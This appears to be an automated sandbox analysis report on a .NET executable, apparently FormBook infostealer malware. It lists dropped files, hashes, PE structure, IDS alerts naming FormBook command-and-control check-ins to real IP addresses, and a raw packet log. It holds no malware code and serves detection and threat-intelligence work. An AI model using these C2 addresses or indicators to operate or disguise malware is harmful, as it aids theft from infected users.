                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):2232
                                                                                  Entropy (8bit):5.380805901110357
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
                                                                                  MD5:16AD599332DD2FF94DA0787D71688B62
                                                                                  SHA1:02F738694B02E84FFE3BAB7DE5709001823C6E40
                                                                                  SHA-256:452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
                                                                                  SHA-512:A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
                                                                                  Malicious:false
                                                                                  Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                  Process:C:\Windows\SysWOW64\fontview.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Entropy (8bit):7.84678241128094
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  File name:Item-RQF-9456786.exe
                                                                                  File size:726'016 bytes
                                                                                  MD5:2980d8a9894fb28427f03922f74d1c76
                                                                                  SHA1:615db143a4eaca8788e1110be17e3c2144a594fc
                                                                                  SHA256:c38ac70a0c3bcc6f2f94c6ba1f74365666a20bd8fa7ed97e6c343dcf998f0535
                                                                                  SHA512:55f5508e32b62f915ec67f4e230bc10a7e27f17ea5215b56d0374c2987ddf82eeed040cfb499717be9adb7627cf490baf33b1171b29bd03f5d108b7be1b1f482
                                                                                  SSDEEP:12288:HMyCEyk+AEWTCAJKJdy39PF1w6MgpEEC57g/Hg/elSymFFGSR/7po:HMySoTJKJsNPFVMBelSfZJK
                                                                                  TLSH:13F412747125E516D9E91BF80A21E3BA07B25D4DE911D3078EFEECEB3C19B0A7904253
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J.4g..............0..............)... ...@....@.. ....................................`................................
                                                                                  Icon Hash:00928e8e8686b000
                                                                                  Entrypoint:0x4b29ce
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6734064A [Wed Nov 13 01:52:10 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                  Instruction
                                                                                  jmp dword ptr [00402000h]
                                                                                  add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb297b | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb4000 | 0x58c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb6000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0a08 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb09d4 | 0xb0a00 | d0295f5b3fc106a466f6dc430601ccdb | False | 0.9232088751769285 | data | 7.853755430579226 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb4000 | 0x58c | 0x600 | ee42c5c18c13dd70ddf5d737ac57c560 | False | 0.4166666666666667 | data | 4.041516124813799 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb6000 | 0xc | 0x200 | 72c68ec337e915da5fa16f433521afc3 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xb4090 | 0x2fc | data | | | 0.4410994764397906
RT_MANIFEST | 0xb439c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-13T15:33:26.506314+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 14.175.87.197 | 443 | 192.168.2.5 | 49727 | TCP
2024-11-13T15:34:05.939404+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 14.175.87.197 | 443 | 192.168.2.5 | 49940 | TCP
2024-11-13T15:34:06.956752+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49950 | 185.134.245.113 | 80 | TCP
2024-11-13T15:34:06.956752+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49950 | 185.134.245.113 | 80 | TCP
2024-11-13T15:34:23.994480+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49983 | 208.115.225.220 | 80 | TCP
2024-11-13T15:34:25.924547+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49984 | 208.115.225.220 | 80 | TCP
2024-11-13T15:34:28.459454+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49985 | 208.115.225.220 | 80 | TCP
2024-11-13T15:34:30.995967+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49986 | 208.115.225.220 | 80 | TCP
2024-11-13T15:34:30.995967+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49986 | 208.115.225.220 | 80 | TCP
2024-11-13T15:34:37.185749+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49987 | 194.58.112.174 | 80 | TCP
2024-11-13T15:34:39.695401+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49988 | 194.58.112.174 | 80 | TCP
2024-11-13T15:34:42.646152+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49989 | 194.58.112.174 | 80 | TCP
2024-11-13T15:34:45.236728+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49990 | 194.58.112.174 | 80 | TCP
2024-11-13T15:34:45.236728+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49990 | 194.58.112.174 | 80 | TCP
2024-11-13T15:34:52.388822+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49991 | 20.2.36.112 | 80 | TCP
2024-11-13T15:34:54.935711+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49992 | 20.2.36.112 | 80 | TCP
2024-11-13T15:34:57.545146+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49993 | 20.2.36.112 | 80 | TCP
2024-11-13T15:35:00.107606+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49994 | 20.2.36.112 | 80 | TCP
2024-11-13T15:35:00.107606+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49994 | 20.2.36.112 | 80 | TCP
2024-11-13T15:35:05.997934+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49995 | 203.161.46.205 | 80 | TCP
2024-11-13T15:35:08.532649+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49996 | 203.161.46.205 | 80 | TCP
2024-11-13T15:35:11.091578+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49997 | 203.161.46.205 | 80 | TCP
2024-11-13T15:35:14.617206+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49998 | 203.161.46.205 | 80 | TCP
2024-11-13T15:35:14.617206+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49998 | 203.161.46.205 | 80 | TCP
2024-11-13T15:35:20.895373+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49999 | 68.66.226.92 | 80 | TCP
2024-11-13T15:35:23.479307+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50000 | 68.66.226.92 | 80 | TCP
2024-11-13T15:35:26.001141+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50001 | 68.66.226.92 | 80 | TCP
2024-11-13T15:35:28.543456+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50002 | 68.66.226.92 | 80 | TCP
2024-11-13T15:35:28.543456+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50002 | 68.66.226.92 | 80 | TCP
2024-11-13T15:35:34.686169+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50003 | 109.70.26.37 | 80 | TCP
2024-11-13T15:35:37.795182+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50004 | 109.70.26.37 | 80 | TCP
2024-11-13T15:35:39.748234+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50005 | 109.70.26.37 | 80 | TCP
2024-11-13T15:35:42.341995+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50006 | 109.70.26.37 | 80 | TCP
2024-11-13T15:35:42.341995+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50006 | 109.70.26.37 | 80 | TCP
2024-11-13T15:35:51.201369+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50007 | 20.2.249.7 | 80 | TCP
2024-11-13T15:35:53.763868+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50008 | 20.2.249.7 | 80 | TCP
2024-11-13T15:35:56.310755+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50009 | 20.2.249.7 | 80 | TCP
2024-11-13T15:35:58.921418+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50010 | 20.2.249.7 | 80 | TCP
2024-11-13T15:35:58.921418+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50010 | 20.2.249.7 | 80 | TCP
2024-11-13T15:36:05.114998+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50011 | 172.67.197.57 | 80 | TCP
2024-11-13T15:36:07.717686+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50012 | 172.67.197.57 | 80 | TCP
2024-11-13T15:36:10.182261+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50013 | 172.67.197.57 | 80 | TCP
2024-11-13T15:36:12.733186+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50014 | 172.67.197.57 | 80 | TCP
2024-11-13T15:36:12.733186+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50014 | 172.67.197.57 | 80 | TCP
2024-11-13T15:36:18.896260+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50015 | 50.18.131.220 | 80 | TCP
2024-11-13T15:36:21.198476+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50016 | 50.18.131.220 | 80 | TCP
2024-11-13T15:36:23.779119+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50017 | 50.18.131.220 | 80 | TCP
2024-11-13T15:36:26.700645+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50018 | 50.18.131.220 | 80 | TCP
2024-11-13T15:36:26.700645+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50018 | 50.18.131.220 | 80 | TCP
2024-11-13T15:36:40.910512+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50019 | 103.224.182.242 | 80 | TCP
2024-11-13T15:36:43.419423+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50020 | 103.224.182.242 | 80 | TCP
2024-11-13T15:36:46.827586+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50021 | 103.224.182.242 | 80 | TCP
2024-11-13T15:36:49.331594+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50022 | 103.224.182.242 | 80 | TCP
2024-11-13T15:36:49.331594+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50022 | 103.224.182.242 | 80 | TCP
2024-11-13T15:36:55.120070+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50023 | 76.223.74.74 | 80 | TCP
2024-11-13T15:36:57.662562+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50024 | 76.223.74.74 | 80 | TCP
2024-11-13T15:37:00.260720+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50025 | 76.223.74.74 | 80 | TCP
2024-11-13T15:37:02.851534+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50026 | 76.223.74.74 | 80 | TCP
2024-11-13T15:37:02.851534+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50026 | 76.223.74.74 | 80 | TCP
2024-11-13T15:37:09.841662+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50027 | 163.44.185.183 | 80 | TCP
2024-11-13T15:37:12.389384+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50028 | 163.44.185.183 | 80 | TCP
2024-11-13T15:37:14.922552+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50029 | 163.44.185.183 | 80 | TCP
2024-11-13T15:37:17.605683+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50030 | 163.44.185.183 | 80 | TCP
2024-11-13T15:37:17.605683+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50030 | 163.44.185.183 | 80 | TCP
2024-11-13T15:37:24.060641+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50031 | 188.114.96.3 | 80 | TCP
2024-11-13T15:37:26.215611+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50032 | 188.114.96.3 | 80 | TCP
2024-11-13T15:37:28.803116+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50033 | 188.114.96.3 | 80 | TCP
2024-11-13T15:37:31.486188+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 50034 | 188.114.96.3 | 80 | TCP
2024-11-13T15:37:31.486188+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50034 | 188.114.96.3 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                  Nov 13, 2024 15:34:55.379005909 CET4999280192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:55.435930967 CET4999280192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:56.455594063 CET4999380192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:56.535548925 CET804999320.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:34:56.535660028 CET4999380192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:56.555814028 CET4999380192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:56.560726881 CET804999320.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:34:56.560975075 CET804999320.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:34:57.504945040 CET804999320.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:34:57.545145988 CET4999380192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:57.685012102 CET804999320.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:34:57.685178041 CET4999380192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:58.060830116 CET4999380192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:59.080638885 CET4999480192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:59.085537910 CET804999420.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:34:59.085647106 CET4999480192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:59.095902920 CET4999480192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:34:59.100929976 CET804999420.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:35:00.061930895 CET804999420.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:35:00.107605934 CET4999480192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:35:00.245018005 CET804999420.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:35:00.245155096 CET4999480192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:35:00.246299028 CET4999480192.168.2.520.2.36.112
                                                                                  Nov 13, 2024 15:35:00.251266003 CET804999420.2.36.112192.168.2.5
                                                                                  Nov 13, 2024 15:35:05.302783012 CET4999580192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:05.309724092 CET8049995203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:05.310383081 CET4999580192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:05.323255062 CET4999580192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:05.328267097 CET8049995203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:05.997848034 CET8049995203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:05.997863054 CET8049995203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:05.997879982 CET8049995203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:05.997890949 CET8049995203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:05.997903109 CET8049995203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:05.997934103 CET4999580192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:05.998008966 CET4999580192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:05.998128891 CET8049995203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:05.998140097 CET8049995203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:05.998152018 CET8049995203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:05.998208046 CET4999580192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:05.998259068 CET8049995203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:05.998267889 CET8049995203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:05.998316050 CET4999580192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:06.003115892 CET8049995203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:06.003142118 CET8049995203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:06.003153086 CET8049995203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:06.003180981 CET4999580192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:06.003345013 CET8049995203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:06.003395081 CET4999580192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:06.116971970 CET8049995203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:06.117007971 CET8049995203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:06.117115021 CET4999580192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:06.117295027 CET8049995203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:06.117341995 CET4999580192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:06.827341080 CET4999580192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:07.844969988 CET4999680192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:07.849976063 CET8049996203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:07.850032091 CET4999680192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:07.866269112 CET4999680192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:07.871215105 CET8049996203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:08.532572985 CET8049996203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:08.532588005 CET8049996203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:08.532598972 CET8049996203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:08.532609940 CET8049996203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:08.532649040 CET4999680192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:08.532658100 CET8049996203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:08.532669067 CET8049996203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:08.532691956 CET4999680192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:08.532782078 CET8049996203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:08.532783985 CET4999680192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:08.532800913 CET8049996203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:08.532813072 CET8049996203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:08.533004999 CET8049996203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:08.533018112 CET4999680192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:08.533801079 CET4999680192.168.2.5203.161.46.205
                                                                                  Nov 13, 2024 15:35:08.537866116 CET8049996203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:08.537878036 CET8049996203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:08.537890911 CET8049996203.161.46.205192.168.2.5
                                                                                  Nov 13, 2024 15:35:08.537904024 CET8049996203.161.46.205192.168.2.5
